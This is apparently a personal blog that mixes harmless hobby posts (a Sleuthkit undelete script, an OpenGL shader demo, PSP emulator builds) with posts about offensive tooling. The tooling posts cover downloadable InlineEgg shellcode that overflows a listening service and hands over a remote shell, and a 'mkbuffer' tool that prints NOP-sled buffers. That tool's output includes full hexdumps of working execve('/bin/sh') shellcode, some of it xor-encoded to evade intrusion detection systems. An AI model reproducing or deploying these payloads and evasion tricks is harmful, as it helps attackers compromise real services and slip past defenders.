Undelete with Sleuthkit

Wrote a little Bash script using Sleuthkit tools to recover a deleted file from a partion. Tested the script with ext2 and fat32 filesystems.

Setup a test image:

dd  if=/dev/zero of=image  bs=1k count=8192
mkfs.ext2 image
mount -o loop image /mnt/image
cp something /mnt/image
rm /mnt/image/something
sync
umount /mnt/image

Now you can start the script to find a token of the deleted file:

./find.sh image “Test”

The Code for find.sh

#!/bin/sh
 
IMAGE=$1
TOKEN=$2
BSIZE=1024
TYPE="linux-ext2"
TMP="dls_$(date +%Y%d%m_%H%M%S)"
 
if [ $# -ne 2 ]
then
    echo "Usage: $0 image token"
    exit -1
fi
 
if [ ! -f $IMAGE ]
then
  echo "Cannot find $IMAGE"
  exit -1
fi
 
if [  -z "$TOKEN" ]
then
  echo "Pleae give search token"
  exit -1
fi
 
echo "--------------------------"
echo "Found deleted"
fls -f $TYPE -rd $IMAGE
dls -f $TYPE $IMAGE > $TMP
strings -t d $TMP > $TMP.str
echo "--------------------------"
grep -i "$TOKEN" $TMP.str
echo "--------------------------"
echo -en "Select Offset:"
read n
ADDR=$(grep -i "$TOKEN" $TMP.str | grep "$n" |  sed 's/^[ \t]*//' | head -n 1 | cut -d " " -f1)
if [ -z "$ADDR" ]
then
    echo "Nothing found for '$TOKEN'"
    exit -1
fi
echo "Found $ADDR"
OFFSET=$(echo "$ADDR / $BSIZE" | bc)
echo "Using Offset $OFFSET"
BLOCK=$(dcalc -f $TYPE  -u $OFFSET  $IMAGE)
echo "Using Block $BLOCK"
echo "----------------------------"
dcat -f $TYPE  $IMAGE  $BLOCK
echo
echo "----------------------------"
INODE=$(ifind -f $TYPE  $IMAGE -d $BLOCK)
echo "Found Inode $INODE"
istat -f $TYPE $IMAGE $INODE
BLOCKS=$(istat -f $TYPE $IMAGE $INODE | tail -n 1)
echo "---------------------------"
echo "Found Blocks $BLOCKS"
echo "---------------------------"
(for BLOCK in $BLOCKS
do
   dcat -f $TYPE  $IMAGE  $BLOCK
done) | tee $TMP.found
echo "---------------------------"
echo "Saved to $TMP.found"
echo "---------------------------"
rm -f $TMP $TMP.str

InlineEgg Shellcode

Made a nice shellcode using the python inlineEgg library. The shellcode is designed to smash the stack of a programm which is listen on a socket. The read buffer gets overflowed by the shellcode. The code was tested an on older SUSE9.0, because current disto use pie and ssp

Features:

  • Python script that generates the shellcode
  • Re-uses the listen socket of the victim and connects it to new shell
  • Scans for correct fd and peername
  • Embedded Telnet client which connects to created remote shell
  • Encoder to generate polymorph shellcode

    Download

mkbuffer0.2

Updated my shellcode generation tool. Added shellcode encryption, to hide from IDS which scan for well known strings in the shellcode, like ‘/bin/sh’. The encryption is quite simple, just add,sub,xor or move by an fixed offset. The tool added also a hook to decode the shellcode before it gets called.

Changelog:

  • Use getopt for command line parsing
  • Fixed off by one bug in hex dump output
  • Added simple shellcode encryption

./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End:   0x0x80499c9
Len:   0x0029 (41 bytes)
jump:  0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------


Download

OpenGL and GLSL Demo

Found some time to play with GLSL Extension. I started with a simple Cube Demo from NeHe using SDL for the user interface programming. Then i added GLEW as the GLSL extension wrapper. The Shader Programs are taken from Linux Magazin Article. Currently no own ideas 🙂 First i had to refresh my OpenGL basics. So i added some switches to trigger Alpha Blending and different textures.

When running the demo you press following keys to trigger different effects:

  • ‘l’ to toggle Light
  • ‘b’ to enable Alpha Blend
  • ‘f’ to step through NEAREST, LINEAR and MIPMAP textures
  • ‘s’ toggle current Shader Programm
  • ‘n’ switch to different Shader Programms

Use the mouse and the left button to rotate the cube. The right button and mouse motion to zoom into the scene. The code was tested with a Nvida GT6800 card. You’ll need nvidia GL library, Glew and SDLlib to build it from sources.

Toonshading

glsl

Deformation

glsl

Mipmapped Texture

glsl

Source

New Stella Build

Updated PSP build to reflect lastest changes of the of the Stella project. Currently the PSP build only works when not disabling the Debugger Console during compile time. So this time configure option –disable-developer will leed to a broken build, even when the debugger is not useable on the PSP. This build is done with revison 1426 of pspsdk and libsdl.

Building

To build for the PSP, make sure psp-config is in the path and run:


   ./configure --host=psp 
   make
   make psp-layout
   make psp-upload

Dependencies

Download

Source

Shellcode Tool

Inspired by an article in german Hakin9 Magazin from October 2005, i wrote a little programm to test and generate shellcode.A good place to learn about buffer overflows is here. I found a interesting python framwork called inlinegg for shellcode generating. This make shellcode developing really easy and effective.

My simple tool is used to prepare buffers with shellcode.The actual asm code is done with nasm and linked a against a gcc main programm. The programm has three modes: dump, exec and gen.

Dump does a hexdump of the plain shellcode, usefull when tracing null bytes.

For testing the functionality of the shellcode you can use exec which simple calls the shellcode like function.

Gen is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, raw code it written to stderr and also the enviroment var $CODE is set. Also the target buffer size and stack jump address as to be passed to the program. The buffer ist first filled with the jump address and then the first half with NOPs overwritten. The shellcode gets copied to the middle of the buffer.


./mkbuffer gen 256  0x1234567
Start: 0x0x8048bb0
End:   0x0x8048bd9
Len:   0x29 (41 bytes)
jump:  0x1234567
90
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
setup env $CODE



Download

New Kbtsco Release

A new Kbtsco release is available. Did some small tweaks.

  • Added Channel Forcing via Configure Menu. Some people reported having problems with the channel auto dedection, so that it’s now possible to asign the channel manually.
  • Added Cancel Menu item to interrupt the connect process, in case somebody hits the Connect button when no headset is available.
  • Switched Build System from Autotools to bksys.

Download

New Stella Release

Finished a new release of the the Atari 2600 Emulator Stella for the PSP. Did some bug fixing and fixed the build system to work with latest pspsdk. It’s seems that the Stella 2.0 version is nearly finished and it will be released on the official site in the near future.

Change Log

  • Fixed build system work with latest pspsdk ans psptoolchain
  • New key mapping
  • Control menu to access advanced features during the emulation
  • Support for overclocking via the configfile

Stella Stella Stella Stella

Laucher Menu

Game Menu

Control Menu

Emulation

Download

Source